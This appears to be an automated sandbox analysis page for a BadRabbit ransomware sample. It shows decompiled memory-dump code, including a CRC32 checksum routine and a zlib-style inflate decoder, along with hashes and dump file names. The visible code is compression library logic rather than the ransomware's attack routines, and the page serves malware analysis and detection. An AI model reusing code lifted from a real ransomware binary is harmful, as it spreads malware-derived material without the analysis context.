*(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t229 >> 0x18) * 4) ^  *(0x1325718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t229 >> 0x18) * 4) ^  *(0x1325718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t171 >> 0x18) * 4) ^  *(0x1325718 + (_t171 & 0x000000ff) * 4) ^ _t250[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t229 >> 0x18) * 4) ^  *(0x1325718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t229 >> 0x18) * 4) ^  *(0x1325718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t171 >> 0x18) * 4) ^  *(0x1325718 + (_t171 & 0x000000ff) * 4) ^ _t250[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t235 >> 0x18) * 4) ^  *(0x1325718 + (_t235 & 0x000000ff) * 4) ^ _t250[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t229 >> 0x18) * 4) ^  *(0x1325718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t229 >> 0x18) * 4) ^  *(0x1325718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t171 >> 0x18) * 4) ^  *(0x1325718 + (_t171 & 0x000000ff) * 4) ^ _t250[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t229 >> 0x18) * 4) ^  *(0x1325718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t229 >> 0x18) * 4) ^  *(0x1325718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t171 >> 0x18) * 4) ^  *(0x1325718 + (_t171 & 0x000000ff) * 4) ^ _t250[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t235 >> 0x18) * 4) ^  *(0x1325718 + (_t235 & 0x000000ff) * 4) ^ _t250[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t177 >> 0x18) * 4) ^  *(0x1325718 + (_t177 & 0x000000ff) * 4) ^ _t250[4]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (_t241 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t241 >> 0x18) * 4) ^  *(0x1325718 + (_t241 & 0x000000ff) * 4) ^ _t250[5]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t183 >> 0x18) * 4) ^  *(0x1325718 + (_t183 & 0x000000ff) * 4) ^ _t250[6]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (_t247 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t247 >> 0x18) * 4) ^  *(0x1325718 + (_t247 & 0x000000ff) * 4);
						_t84 =  &_a4;
						 *_t84 = _a4 - 1;
						if( *_t84 == 0) {
							break;
						}
						_t189 = _a8;
						_t222 = 0xff;
					}
				}
				if(_t248 >= 4) {
					_t224 = _t248 >> 2;
					do {
						_t164 = _t161 ^  *_t249;
						_t248 = _t248 - 4;
						_t249 =  &(_t249[4]);
						_t161 =  *(0x1324f18 + (_t164 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (_t164 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t164 >> 0x18) * 4) ^  *(0x1325718 + (_t164 & 0x000000ff) * 4);
						_t224 = _t224 - 1;
					} while (_t224 != 0);
				}
				if(_t248 != 0) {
					do {
						_t161 = _t161 >> 0x00000008 ^  *(0x1324b18 + (( *_t249 & 0x000000ff ^ _t161) & 0x000000ff) * 4);
						_t249 =  &(_t249[1]);
						_t248 = _t248 - 1;
					} while (_t248 != 0);
				}
				return  !_t161;
			}

0x013230e6
0x013230e9
0x013230f4
0x013230f7
0x013230f9
0x013230fb
0x013230fb
0x013230fe
0x00000000
0x00000000
0x01323100
0x01323103
0x0132310f
0x01323116
0x01323117
0x00000000
0x01323117
0x00000000
0x01323103
0x0132311d
0x0132331b
0x01323123
0x01323128
0x01323135
0x01323135
0x0132313a
0x01323146
0x0132325e
0x0132326d
0x013232d5
0x013232d8
0x013232dd
0x01323309
0x01323310
0x01323310
0x01323313
0x00000000
0x00000000
0x0132312d
0x01323130
0x01323130
0x01323319
0x01323321
0x01323325
0x01323328
0x01323328
0x0132332a
0x01323334
0x01323369
0x0132336b
0x0132336b
0x01323328
0x01323370
0x01323372
0x0132337f
0x01323386
0x01323387
0x01323387
0x01323372
0x01323392

Strings

8 Oet, xrefs: 013230F2

Memory Dump Source

Source File: 00000001.00000002.279315989.0000000001321000.00000020.00000001.01000000.00000006.sdmp, Offset: 01320000, based on PE: true

Associated: 00000001.00000002.279306762.0000000001320000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.279324500.0000000001324000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.279331497.0000000001329000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1320000_Endermanch@BadRabbit.jbxd

Similarity

API ID:
String ID: 8 Oet
API String ID: 0-3278195550
Opcode ID: f6cdbe7c7c58d5c9836790e024915df736017f01d04678ed5a58fbf993f1e40d
Instruction ID: b2d3567a003a99f851212e3a7ca8cd9c51bbdf67b8f2698f7c64c1c912b3741f
Opcode Fuzzy Hash: f6cdbe7c7c58d5c9836790e024915df736017f01d04678ed5a58fbf993f1e40d
Instruction Fuzzy Hash: 7271B3317205519BD734EE1EECD0A657366F78D710F4A853CDA4683389C639E626CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 01321F3B Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E01321F3B(signed int* __ebx, unsigned int __edx, signed int __edi, void* __esi) {
				signed int _t753;
				int _t763;
				int _t765;
				int _t770;
				int _t771;
				signed int _t774;
				int _t775;
				void* _t796;
				int _t797;
				int _t799;
				signed int* _t800;
				signed char _t803;
				signed int _t805;
				int _t806;
				void* _t811;
				signed int _t822;
				int _t824;
				signed int _t833;
				intOrPtr _t834;
				int _t835;
				void* _t837;
				intOrPtr* _t838;
				void* _t841;
				void* _t843;

				L0:
				while(1) {
					L0:
					_t837 = __esi;
					_t800 = __ebx;
					_t803 = __edi & 0x00000007;
					_t833 = __edi - _t803;
					_t822 = __edx >> _t803;
					 *(_t841 - 0xc) = _t822;
					 *(_t841 - 0x10) = _t833;
					if(_t833 >= 0x20) {
						goto L168;
					}
					L165:
					__eax =  *(__ebp - 8);
					while(1) {
						L166:
						__ecx =  *(__ebp - 4);
						if(__ecx == 0) {
							break;
						}
						L167:
						__eax =  *__eax & 0x000000ff;
						 *(__ebp - 4) = __ecx;
						__ecx = __edi;
						__eax = __eax << __cl;
						__edi = __edi + 8;
						__edx = __eax + __edx;
						 *(__ebp - 0x10) = __edi;
						__eax =  *(__ebp - 8);
						__eax =  *(__ebp - 8) + 1;
						 *(__ebp - 0xc) = __edx;
						 *(__ebp - 8) = __eax;
						if(__edi < 0x20) {
							continue;
						}
						goto L168;
					}
					L323:
					_t712 = _t841 + 8; // 0x38
					_t838 =  *_t712;
					 *(_t838 + 0xc) =  *(_t841 - 0x1c);
					_t716 = _t841 - 8; // 0x38
					 *((intOrPtr*)(_t838 + 0x10)) =  *((intOrPtr*)(_t841 - 0x18));
					_t824 = 0;
					 *_t838 =  *_t716;
					 *(_t838 + 4) = _t806;
					_t800[0xf] = _t833;
					_t834 =  *((intOrPtr*)(_t841 - 0x28));
					_t800[0xe] =  *(_t841 - 0xc);
					if(_t800[0xa] != 0) {
						L328:
						_t763 = E01322DCB(_t838,  *(_t838 + 0xc), _t834 -  *((intOrPtr*)(_t838 + 0x10)));
						if(_t763 == 0) {
							L331:
							_t824 = 0;
							L332:
							_t765 =  *(_t841 - 0x38) -  *(_t838 + 4);
							_t835 = _t834 -  *((intOrPtr*)(_t838 + 0x10));
							 *((intOrPtr*)(_t838 + 8)) =  *((intOrPtr*)(_t838 + 8)) + _t765;
							 *((intOrPtr*)(_t838 + 0x14)) =  *((intOrPtr*)(_t838 + 0x14)) + _t835;
							_t800[7] = _t800[7] + _t835;
							 *(_t841 - 0x38) = _t765;
							if(_t800[2] != _t824) {
								if(_t835 != 0) {
									_push(_t835);
									_push( *(_t838 + 0xc) - _t835);
									_push(_t800[6]);
									if(_t800[4] == _t824) {
										_t774 = E01322E91();
									} else {
										_t774 = E013230C1();
									}
									_t800[6] = _t774;
									_t824 = 0;
									 *(_t838 + 0x30) = _t774;
								}
							}
							if( *_t800 == 0x13) {
								L340:
								_t824 = 0x100;
								goto L341;
							} else {
								L339:
								if( *_t800 != 0xe) {
									L341:
									 *((intOrPtr*)(_t841 + 8)) = 0x80;
									asm("sbb ecx, ecx");
									_t767 =  ==  ?  *((void*)(_t841 + 8)) : 0;
									_t768 = ( ==  ?  *((void*)(_t841 + 8)) : 0) + ( ~(_t800[1]) & 0x00000040) + _t824;
									_t769 = ( ==  ?  *((void*)(_t841 + 8)) : 0) + ( ~(_t800[1]) & 0x00000040) + _t824 + _t800[0xf];
									 *((intOrPtr*)(_t838 + 0x2c)) = ( ==  ?  *((void*)(_t841 + 8)) : 0) + ( ~(_t800[1]) & 0x00000040) + _t824 + _t800[0xf];
									if( *(_t841 - 0x38) != 0) {
										L343:
										if( *((intOrPtr*)(_t841 + 0xc)) != 4) {
											L345:
											_t770 =  *(_t841 - 0x20);
											L138:
											return _t770;
										}
										L344:
										_t771 =  *(_t841 - 0x20);
										_t811 = 0xfffffffb;
										_t770 =  ==  ? _t811 : _t771;
										goto L138;
									}
									L342:
									if(_t835 == 0) {
										goto L344;
									}
									goto L343;
								}
								goto L340;
							}
						}
						L329:
						 *_t800 = 0x1e;
						L330:
						_push(0xfffffffc);
						L137:
						_pop(_t770);
						goto L138;
					}
					L324:
					if(_t834 ==  *((intOrPtr*)(_t838 + 0x10))) {
						goto L332;
					}
					L325:
					if( *_t800 >= 0x1d) {
						goto L332;
					}
					L326:
					if( *_t800 < 0x1a) {
						goto L328;
					}
					L327:
					if( *((intOrPtr*)(_t841 + 0xc)) == 4) {
						goto L332;
					}
					goto L328;
					L168:
					_t805 = _t822 & 0x0000ffff;
					if(_t805 ==  !_t822 >> 0x10) {
						L170:
						_t800[0x10] = _t805;
						_t822 = 0;
						_t806 =  *(_t841 - 4);
						_t833 = 0;
						 *(_t841 - 0xc) = 0;
						 *(_t841 - 0x10) = 0;
						 *_t800 = 0xe;
						if( *((intOrPtr*)(_t841 + 0xc)) == 6) {
							goto L323;
						}
						L171:
						 *_t800 = 0xf;
						L172:
						_t775 = _t800[0x10];
						if(_t775 == 0) {
							L175:
							 *_t800 = 0xb;
							while(1) {
								L135:
								_t753 =  *_t800;
								if(_t753 > 0x1e) {
									break;
								}
								L1:
								switch( *((intOrPtr*)(_t753 * 4 +  &M01322B54))) {
									case 0:
										L2:
										if(_t800[2] != 0) {
											L4:
											_push(0x10);
											_pop(_t776);
											__eflags = _t833 - _t776;
											if(_t833 >= _t776) {
												L8:
												__eflags = _t800[2] & 0x00000002;
												if((_t800[2] & 0x00000002) == 0) {
													L11:
													_t800[4] = _t800[4] & 0x00000000;
													_t777 = _t800[8];
													__eflags = _t777;
													if(_t777 != 0) {
														_t27 = _t777 + 0x30;
														 *_t27 =  *(_t777 + 0x30) | 0xffffffff;
														__eflags =  *_t27;
													}
													L13:
													__eflags = _t800[2] & 0x00000001;
													if((_t800[2] & 0x00000001) == 0) {
														L24:
														 *(_t837 + 0x18) = "incorrect header check";
														goto L17;
													}
													L14:
													_t780 = (_t822 >> 8) + ((_t822 & 0x000000ff) << 8);
													_push(0x1f);
													_pop(_t814);
													__eflags = _t780 % _t814;
													_t822 =  *(_t841 - 0xc);
													if(_t780 % _t814 != 0) {
														goto L24;
													}
													L15:
													__eflags = (_t822 & 0x0000000f) - 8;
													if((_t822 & 0x0000000f) == 8) {
														L18:
														_t822 = _t822 >> 4;
														_t833 = _t833 - 4;
														 *(_t841 - 0xc) = _t822;
														 *(_t841 - 0x10) = _t833;
														_t817 = (_t822 & 0x0000000f) + 8;
														__eflags = _t800[9];
														if(_t800[9] != 0) {
															L22:
															__eflags = _t817 - _t800[9];
															if(_t817 <= _t800[9]) {
																goto L20;
															} else {
																 *(_t837 + 0x18) = "invalid window size";
																goto L17;
															}
														} else {
															_t800[9] = _t817;
															L20:
															_t833 = 0;
															_t800[5] = 1 << _t817;
															_t787 = E01322E91(0, 0, 0);
															_t800[6] = _t787;
															 *(_t837 + 0x30) = _t787;
															_t831 =  !( *(_t841 - 0xc) >> 8) & 0x00000002 | 0x00000009;
															__eflags = _t831;
															 *_t800 = _t831;
															_t822 = 0;
															goto L21;
														}
													} else {
														 *(_t837 + 0x18) = "unknown compression method";
														goto L17;
													}
												}
												L9:
												__eflags = _t822 - 0x8b1f;
												if(_t822 != 0x8b1f) {
													goto L11;
												} else {
													_t833 = 0;
													_t800[6] = E013230C1(0, 0, 0);
													_push(0x1f);
													_pop(_t789);
													 *((char*)(_t841 - 0x14)) = _t789;
													 *((char*)(_t841 - 0x13)) = 0x8b;
													_t791 = E013230C1(_t800[6], _t841 - 0x14, 2);
													_t822 = 0;
													_t800[6] = _t791;
													 *(_t841 - 0xc) = 0;
													 *(_t841 - 0x10) = 0;
													 *_t800 = 1;
													goto L134;
												}
											} else {
												_t6 = _t841 - 8; // 0x38
												_t792 =  *_t6;
												while(1) {
													L6:
													__eflags = _t806;
													if(_t806 == 0) {
														goto L322;
													}
													L7:
													 *(_t841 - 4) = _t806 - 1;
													_t794 = ( *_t792 & 0x000000ff) << _t833;
													_t833 = _t833 + 8;
													_t806 =  *(_t841 - 4);
													_t822 = _t822 + _t794;
													_t9 = _t841 - 8; // 0x38
													_t792 =  *_t9 + 1;
													 *(_t841 - 0xc) = _t822;
													 *(_t841 - 8) = _t792;
													 *(_t841 - 0x10) = _t833;
													__eflags = _t833 - 0x10;
													if(_t833 < 0x10) {
														continue;
													}
													goto L8;
												}
												goto L322;
											}
										} else {
											 *_t800 = 0xc;
											goto L135;
										}
									case 1:
										L25:
										_push(0x10);
										_pop(__eax);
										__eflags = __edi - __eax;
										if(__edi >= __eax) {
											L29:
											 *(__ebx + 0x10) = __edx;
											__eflags = __dl - 8;
											if(__dl == 8) {
												L32:
												__eflags = __edx & 0x0000e000;
												if((__edx & 0x0000e000) == 0) {
													L34:
													__ecx =  *(__ebx + 0x20);
													__eflags = __ecx;
													if(__ecx != 0) {
														__edx = __edx >> 8;
														__eax = __edx >> 0x00000008 & 0x00000001;
														__eflags = __eax;
														 *__ecx = __eax;
													}
													__eflags =  *(__ebx + 0x10) & 0x00000200;
													if(( *(__ebx + 0x10) & 0x00000200) != 0) {
														 *(__ebp - 0x14) = __dl;
														__eax = __ebp - 0x14;
														__eflags = __edx;
														 *(__ebp - 0x13) = __dl;
														 *(__ebx + 0x18) = E013230C1( *(__ebx + 0x18), __ebp - 0x14, 2);
													}
													__ecx =  *(__ebp - 4);
													__eax = 0;
													__eflags = 0;
													__edx = 0;
													 *__ebx = 2;
													 *(__ebp - 0xc) = 0;
													__edi = 0;
													goto L39;
												}
												L33:
												 *(__esi + 0x18) = "unknown header flags set";
											} else {
												 *(__esi + 0x18) = "unknown compression method";
											}
											goto L31;
										} else {
											_t51 = __ebp - 8; // 0x38
											__eax =  *_t51;
											while(1) {
												L27:
												__eflags = __ecx;
												if(__ecx == 0) {
													goto L322;
												}
												L28:
												__eax =  *__eax & 0x000000ff;
												 *(__ebp - 4) = __ecx;
												__ecx = __edi;
												__eax = __eax << __cl;
												__edi = __edi + 8;
												__ecx =  *(__ebp - 4);
												__edx = __eax + __edx;
												_t54 = __ebp - 8; // 0x38
												__eax =  *_t54;
												__eax =  *_t54 + 1;
												 *(__ebp - 0xc) = __edx;
												 *(__ebp - 8) = __eax;
												 *(__ebp - 0x10) = __edi;
												__eflags = __edi - 0x10;
												if(__edi < 0x10) {
													continue;
												}
												goto L29;
											}
											goto L322;
										}
									case 2:
										L39:
										__eflags = __edi - 0x20;
										if(__edi >= 0x20) {
											L43:
											__eax =  *(__ebx + 0x20);
											__eflags = __eax;
											if(__eax != 0) {
												 *(__eax + 4) = __edx;
											}
											__eflags =  *(__ebx + 0x10) & 0x00000200;
											if(( *(__ebx + 0x10) & 0x00000200) != 0) {
												__eax = __edx;
												 *(__ebp - 0x14) = __dl;
												__eax = __edx >> 8;
												 *(__ebp - 0x13) = __al;
												__edx = __edx >> 0x10;
												 *(__ebp - 0x12) = __al;
												__eax = __ebp - 0x14;
												__eflags = __edx;
												 *(__ebp - 0x11) = __dl;
												 *(__ebx + 0x18) = E013230C1( *(__ebx + 0x18), __ebp - 0x14, 4);
											}
											__ecx =  *(__ebp - 4);
											__eax = 0;
											__eflags = 0;
											__edx = 0;
											 *__ebx = 3;
											 *(__ebp - 0xc) = 0;
											__edi = 0;
											goto L48;
										}
										L40:
										_t74 = __ebp - 8; // 0x38
										__eax =  *_t74;
										while(1) {
											L41:
											__eflags = __ecx;
											if(__ecx == 0) {
												goto L322;
											}
											L42:
											__eax =  *__eax & 0x000000ff;
											 *(__ebp - 4) = __ecx;
											__ecx = __edi;
											__eax = __eax << __cl;
											__edi = __edi + 8;
											__ecx =  *(__ebp - 4);
											__edx = __eax + __edx;
											_t77 = __ebp - 8; // 0x38
											__eax =  *_t77;
											__eax =  *_t77 + 1;
											 *(__ebp - 0xc) = __edx;
											 *(__ebp - 8) = __eax;
											__eflags = __edi - 0x20;
											if(__edi < 0x20) {
												continue;
											}
											goto L43;
										}
										goto L322;
									case 3:
										L48:
										_push(0x10);
										_pop(__eax);
										__eflags = __edi - __eax;
										if(__edi >= __eax) {
											L52:
											__ecx =  *(__ebx + 0x20);
											__eflags = __ecx;
											if(__ecx != 0) {
												__eax = __dl & 0x000000ff;
												 *(__ecx + 8) = __dl & 0x000000ff;
												__ecx = __edx;
												__eax =  *(__ebx + 0x20);
												__ecx = __edx >> 8;
												__eflags = __ecx;
												 *( *(__ebx + 0x20) + 0xc) = __ecx;
											}
											__eflags =  *(__ebx + 0x10) & 0x00000200;
											if(( *(__ebx + 0x10) & 0x00000200) != 0) {
												 *(__ebp - 0x14) = __dl;
												__eax = __ebp - 0x14;
												__eflags = __edx;
												 *(__ebp - 0x13) = __dl;
												 *(__ebx + 0x18) = E013230C1( *(__ebx + 0x18), __ebp - 0x14, 2);
											}
											__ecx =  *(__ebp - 4);
											__eax = 0;
											__eflags = 0;
											__edx = 0;
											 *__ebx = 4;
											__edi = 0;
											 *(__ebp - 0xc) = 0;
											 *(__ebp - 0x10) = 0;
											goto L57;
										}
										L49:
										_t94 = __ebp - 8; // 0x38
										__eax =  *_t94;
										while(1) {
											L50:
											__eflags = __ecx;
											if(__ecx == 0) {
												goto L322;
											}
											L51:
											__eax =  *__eax & 0x000000ff;
											 *(__ebp - 4) = __ecx;
											__ecx = __edi;
											__eax = __eax << __cl;
											__edi = __edi + 8;
											__ecx =  *(__ebp - 4);
											__edx = __eax + __edx;
											_t97 = __ebp - 8; // 0x38
											__eax =  *_t97;
											__eax =  *_t97 + 1;
											 *(__ebp - 0xc) = __edx;
											 *(__ebp - 8) = __eax;
											__eflags = __edi - 0x10;
											if(__edi < 0x10) {
												continue;
											}
											goto L52;
										}
										goto L322;
									case 4:
										L57:
										__eflags =  *(__ebx + 0x10) & 0x00000400;
										if(( *(__ebx + 0x10) & 0x00000400) == 0) {
											L67:
											__eax =  *(__ebx + 0x20);
											__eflags = __eax;
											if(__eax != 0) {
												_t138 = __eax + 0x10;
												 *_t138 =  *(__eax + 0x10) & 0x00000000;
												__eflags =  *_t138;
											}
											L69:
											 *__ebx = 5;
											goto L70;
										}
										L58:
										_push(0x10);
										_pop(__eax);
										__eflags = __edi - __eax;
										if(__edi >= __eax) {
											L62:
											__eax =  *(__ebx + 0x20);
											 *(__ebx + 0x40) = __edx;
											__eflags = __eax;
											if(__eax != 0) {
												 *(__eax + 0x14) = __edx;
											}
											__eflags =  *(__ebx + 0x10) & 0x00000200;
											if(( *(__ebx + 0x10) & 0x00000200) != 0) {
												 *(__ebp - 0x14) = __dl;
												__eax = __ebp - 0x14;
												__eflags = __edx;
												 *(__ebp - 0x13) = __dl;
												 *(__ebx + 0x18) = E013230C1( *(__ebx + 0x18), __ebp - 0x14, 2);
											}
											__eax = 0;
											__edi = 0;
											 *(__ebp - 0xc) = 0;
											 *(__ebp - 0x10) = 0;
											goto L69;
										}
										L59:
										_t118 = __ebp - 8; // 0x38
										__eax =  *_t118;
										while(1) {
											L60:
											__eflags = __ecx;
											if(__ecx == 0) {
												goto L322;
											}
											L61:
											__eax =  *__eax & 0x000000ff;
											 *(__ebp - 4) = __ecx;
											__ecx = __edi;
											__eax = __eax << __cl;
											__edi = __edi + 8;
											__ecx =  *(__ebp - 4);
											__edx = __eax + __edx;
											_t121 = __ebp - 8; // 0x38
											__eax =  *_t121;
											__eax =  *_t121 + 1;
											 *(__ebp - 0xc) = __edx;
											 *(__ebp - 8) = __eax;
											__eflags = __edi - 0x10;
											if(__edi < 0x10) {
												continue;
											}
											goto L62;
										}
										goto L322;
									case 5:
										L70:
										__eflags =  *(__ebx + 0x10) & 0x00000400;
										if(( *(__ebx + 0x10) & 0x00000400) == 0) {
											L83:
											__edx = 0;
											__eflags = 0;
											L84:
											__ecx =  *(__ebp - 4);
											 *(__ebx + 0x40) = __edx;
											 *__ebx = 6;
											goto L86;
										}
										L71:
										__ecx =  *(__ebx + 0x40);
										__edx =  *(__ebp - 4);
										__eflags = __ecx - __edx;
										__ecx =  >  ? __edx : __ecx;
										 *(__ebp - 0x30) = __ecx;
										__eflags = __ecx;
										if(__ecx != 0) {
											__edx =  *(__ebx + 0x20);
											__eflags = __edx;
											if(__edx != 0) {
												__eax =  *(__edx + 0x10);
												 *(__ebp - 0x2c) = __eax;
												__eflags = __eax;
												if(__eax != 0) {
													__eax =  *(__edx + 0x14);
													__eax =  *(__edx + 0x14) -  *(__ebx + 0x40);
													__edx =  *(__edx + 0x18);
													 *(__ebp - 0x34) = __eax;
													__eflags = __eax - __edx;
													__eax =  *(__ebp - 0x34);
													if(__eflags <= 0) {
														__edx = __ecx;
													} else {
														__edx = __edx - __eax;
													}
													_t154 = __ebp - 8; // 0x38
													__ecx =  *_t154;
													__eax = __eax +  *(__ebp - 0x2c);
													__eflags = __eax;
													__eax = memcpy(__eax,  *_t154, __edx);
													__ecx =  *(__ebp - 0x30);
													__esp = __esp + 0xc;
												}
											}
											__eflags =  *(__ebx + 0x10) & 0x00000200;
											if(( *(__ebx + 0x10) & 0x00000200) != 0) {
												_t160 = __ebp - 8; // 0x38
												 *(__ebx + 0x18) = E013230C1( *(__ebx + 0x18),  *_t160, __ecx);
											}
											__eax =  *(__ebp - 0x30);
											 *(__ebp - 4) =  *(__ebp - 4) - __eax;
											 *(__ebp - 8) =  *(__ebp - 8) + __eax;
											_t168 = __ebx + 0x40;
											 *_t168 =  *(__ebx + 0x40) - __eax;
											__eflags =  *_t168;
										}
										__edx = 0;
